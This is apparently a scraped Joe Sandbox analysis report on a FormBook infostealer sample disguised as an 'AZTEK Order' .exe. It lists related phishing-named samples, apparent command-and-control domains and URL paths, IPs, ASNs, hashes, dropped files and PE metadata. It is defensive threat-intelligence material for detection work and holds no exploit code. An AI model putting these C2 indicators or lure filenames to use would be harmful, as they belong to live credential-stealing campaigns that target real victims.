                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      11:55:42API Interceptor1x Sleep call for process: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe modified
                                                      11:55:44API Interceptor10x Sleep call for process: powershell.exe modified
                                                      11:56:58API Interceptor10192656x Sleep call for process: compact.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      144.208.124.10spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.superunicornpalace.com/mwa4/
                                                      64.190.62.22spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.hondamechanic.today/pv57/
                                                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                      • www.turf-installer.top/huho/
                                                      Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.hofiw.link/7ixz/
                                                      ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                      • www.hondamechanic.today/expp/
                                                      Transfer Swift USD 87000.exeGet hashmaliciousFormBookBrowse
                                                      • www.chefjob6.live/vpkv/
                                                      unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.woodsplitter1.xyz/9h33/
                                                      BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                      • www.hondamechanic.today/expp/
                                                      BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                      • www.hondamechanic.today/expp/
                                                      Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.woodsplitter1.xyz/9h33/
                                                      z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                                      • www.hondamechanic.today/expp/
                                                      203.161.49.220spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.hellokong.xyz/oui5/
                                                      RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                                      • www.hellokong.xyz/ov93/
                                                      SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                      • www.techsterverse.xyz/5ane/?3jJlx=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HxzfaZ9sFDrl94fCLYBT2VvoaMEhAOTvuaALRdPfNkFFP06X4hxPxwuOU&Vn=Ydx4qJJ0n
                                                      Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                      • www.evertudy.xyz/csr7/
                                                      Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                      • www.evertudy.xyz/csr7/
                                                      Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                                      • www.techsterverse.xyz/5ane/?iHmHOtK=WTbBFWOTcFPDCMhESefslTJ6+GkUog7y940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HwzLeEe0DEJwM8vfrVi/4VNBsPllMeibbLgY=&L480=nFsp
                                                      indent PWS-020199.exeGet hashmaliciousFormBookBrowse
                                                      • www.hellokong.xyz/ov93/
                                                      Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                      • www.evertudy.xyz/csr7/
                                                      Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                      • www.evertudy.xyz/csr7/
                                                      KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • www.evertudy.xyz/csr7/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      parkingpage.namecheap.comspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      Att00173994.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      Attendance list.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      Att0027592.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      #U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                      • 91.195.240.19
                                                      www.mengistiebethlehem.comspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.13
                                                      www.hondamechanic.todayspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      BANK DETAILS CORRECTIONS.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 64.190.62.22
                                                      www.architect-usschool.comspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.84
                                                      CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.84
                                                      ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.84
                                                      reimainternatio.exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.84
                                                      www.rz6grmvv.shopspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 121.254.178.230

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      NBS11696USspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                      • 64.190.63.222
                                                      gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                      • 64.190.63.222
                                                      Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                      • 64.190.63.222
                                                      gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                      • 64.190.63.222
                                                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      Reporte Comercial.pdfGet hashmaliciousUnknownBrowse
                                                      • 64.190.63.136
                                                      Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      D8zldeBMpl.exeGet hashmaliciousNjratBrowse
                                                      • 64.190.63.222
                                                      ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                      • 64.190.62.22
                                                      SHOCK-1USspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 144.208.124.10
                                                      SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 208.123.119.169
                                                      New PO for Project - 00775 00875 02195.exeGet hashmaliciousRemcosBrowse
                                                      • 144.208.127.241
                                                      app.pln.bin.dllGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.110
                                                      app.pln.bin.dllGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.110
                                                      app.exeGet hashmaliciousUnknownBrowse
                                                      • 144.208.127.230
                                                      nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.225
                                                      nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.225
                                                      Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.225
                                                      out.exeGet hashmaliciousUnknownBrowse
                                                      • 209.182.225.225
                                                      VNPT-AS-VNVNPTCorpVNspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.49.220
                                                      AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.50.127
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.43.228
                                                      fisher man.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.55.124
                                                      GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.55.102
                                                      MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.43.228
                                                      7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.41.205
                                                      RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.49.220
                                                      SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.49.220
                                                      RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                      • 203.161.46.44
                                                      CONFLUENCE-NETWORK-INCVGspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.13
                                                      Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                      • 208.91.196.253
                                                      Attendance list.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                      • 208.91.197.27
                                                      e98.dllGet hashmaliciousUnknownBrowse
                                                      • 204.11.56.48

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1172
                                                      Entropy (8bit):5.3550249375369265
                                                      Encrypted:false
                                                      SSDEEP:24:3OWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:eWSU4xympjms4RIoU99tK8NDv
                                                      MD5:F5C607E507119C024A8457EB53A4EACA
                                                      SHA1:E12BA3AFFE22D4699D53BBBFB38281EB20C79523
                                                      SHA-256:B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
                                                      SHA-512:1FA5B1E2F4850B41ED89237D6A2A5FBB7A04101B21362F118D39A4C9891F00F605AA49651DD1B5B37CFA954BD7A08A53F00F7ECAE4966ADA2207AD2DF995B597
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\N77o9w1836

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\compact.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vu4nlwr.vnu.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibragxpy.lej.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxqwflws.i4u.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkv0134n.icc.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.950153009948546
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      File size:990'720 bytes
                                                      MD5:7c33fb31e0b8302eba116a02e649200b
                                                      SHA1:b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
                                                      SHA256:b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
                                                      SHA512:5522c1304b859f40f747d39736cce33af44f21e42534bd95fdd16d0e58ed56dc2adeee933e2f2e02b3370b30ede5825e01ed5934abce6a87ce6cf2193b206a9c
                                                      SSDEEP:24576:h+Z8mj85+Kz5IY/0zChxWmtydHaGaqaRdPWm:hS89l51SChgRHDaRN
                                                      TLSH:422523225B72DB62C97957F085B5028003B2FD2A51F2DB0E5E9AB0FB5A733604952F37
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xt...............0......f......^.... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:66666667e69c310e

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4ed45e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xB57478D9 [Mon Jun 21 01:26:49 2066 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xed40b0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x6400.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf60000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xeb6e80x70.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xeb4640xeb600cb6c31293cf9777191e31acae73fd4f3False0.9721282942777483data7.977348206861711IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xee0000x64000x6400911fec29080872002614227f4a6ee64eFalse0.395625data5.148123427555753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xf60000xc0x20008484031a30739359114958f3aeec9eaFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xee1e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2701612903225806
                                                      RT_ICON0xee4d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.4966216216216216
                                                      RT_ICON0xee6100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5439765458422174
                                                      RT_ICON0xef4c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6656137184115524
                                                      RT_ICON0xefd800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5021676300578035
                                                      RT_ICON0xf02f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3157676348547718
                                                      RT_ICON0xf28b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4090056285178236
                                                      RT_ICON0xf39680x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5859929078014184
                                                      RT_GROUP_ICON0xf3de00x76data0.6440677966101694
                                                      RT_VERSION0xf3e680x398OpenPGP Public Key0.4206521739130435
                                                      RT_MANIFEST0xf42100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
